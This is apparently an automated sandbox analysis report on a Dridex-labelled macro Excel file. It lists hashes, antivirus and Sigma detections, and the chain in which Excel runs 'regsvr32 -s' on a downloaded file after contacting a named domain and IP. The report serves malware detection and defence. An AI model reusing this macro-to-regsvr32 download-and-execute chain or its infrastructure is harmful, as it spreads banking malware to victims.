Loading ...

Play interactive tourEdit tour

Analysis Report Dridex-06-bc1b.xlsm

Overview

General Information

Sample Name:Dridex-06-bc1b.xlsm
Analysis ID:344478
MD5:f72f88ebdf048fdfedf0aa3e298d9e71
SHA1:b8ea58415338bed65d4cd194ead6ac663ad71a6c
SHA256:78ccf25ecee02f759cefa6b1c29a00fb4ce64c000f7b9c04c1fc08e04d04bc1b

Most interesting Screenshot:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 4776 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 5280 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\AO965P\PN546Y\718.5. MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\AO965P\PN546Y\718.5., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\AO965P\PN546Y\718.5., CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 4776, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\AO965P\PN546Y\718.5., ProcessId: 5280

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sampleShow sources
Source: Dridex-06-bc1b.xlsmAvira: detected
Multi AV Scanner detection for domain / URLShow sources
Source: compagniamaestro.comVirustotal: Detection: 13%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: Dridex-06-bc1b.xlsmVirustotal: Detection: 50%Perma Link
Source: Dridex-06-bc1b.xlsmReversingLabs: Detection: 58%

Compliance:

barindex
Uses new MSVCR DllsShow sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exeJump to behavior
Source: global trafficDNS query: name: compagniamaestro.com
Source: global trafficTCP traffic: 192.168.2.5:49721 -> 199.192.21.36:443
Source: global trafficTCP traffic: 192.168.2.5:49721 -> 199.192.21.36:443
Source: Joe Sandbox ViewIP Address: 199.192.21.36 199.192.21.36
Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: unknownDNS traffic detected: queries for: compagniamaestro.com
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://api.aadrm.com/
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://api.cortana.ai
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://api.office.net
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://api.onedrive.com
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://augloop.office.com
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://cdn.entity.
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://clients.config.office.net/
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://config.edge.skype.com
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentities
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://cortana.ai
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://cortana.ai/api
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://cr.office.com
Source: NR7DA722.htm.0.drString found in binary or memory: https://crbug.com/740629)
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://dev.cortana.ai
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://devnull.onenote.com
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://directory.services.
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: NR7DA722.htm.0.drString found in binary or memory: https://github.com/google/closure-compiler/issues/544
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://graph.windows.net
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://graph.windows.net/
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://lifecycle.office.com
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://login.windows.local
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://management.azure.com
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://management.azure.com/
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://messaging.office.com/
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://ncus-000.contentsync.
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://officeapps.live.com
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://onedrive.live.com
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://outlook.office.com/
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://outlook.office365.com/
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://settings.outlook.com
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://staging.cortana.ai
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://tasks.office.com
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://wus2-000.contentsync.
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443

System Summary:

barindex
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Foglio1, Function PagamentoDocumento, API Run("Auto_io22")Name: PagamentoDocumento
Source: Dridex-06-bc1b.xlsmOLE, VBA macro line: Private Sub pagoUno_Layout()
Source: VBA code instrumentationOLE, VBA macro: Module Foglio1, Function pagoUno_LayoutName: pagoUno_Layout
Source: Dridex-06-bc1b.xlsmOLE indicator, VBA macros: true
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: classification engineClassification label: mal80.expl.winXLSM@3/9@1/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{F8438930-316C-43DB-8A79-3A960812721C} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Dridex-06-bc1b.xlsmVirustotal: Detection: 50%
Source: Dridex-06-bc1b.xlsmReversingLabs: Detection: 58%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\AO965P\PN546Y\718.5.
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\AO965P\PN546Y\718.5.Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Dridex-06-bc1b.xlsmInitial sample: OLE zip file path = xl/media/image2.png
Source: Dridex-06-bc1b.xlsmInitial sample: OLE zip file path = xl/media/image3.png
Source: Dridex-06-bc1b.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: Dridex-06-bc1b.xlsmInitial sample: OLE indicators vbamacros = False
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
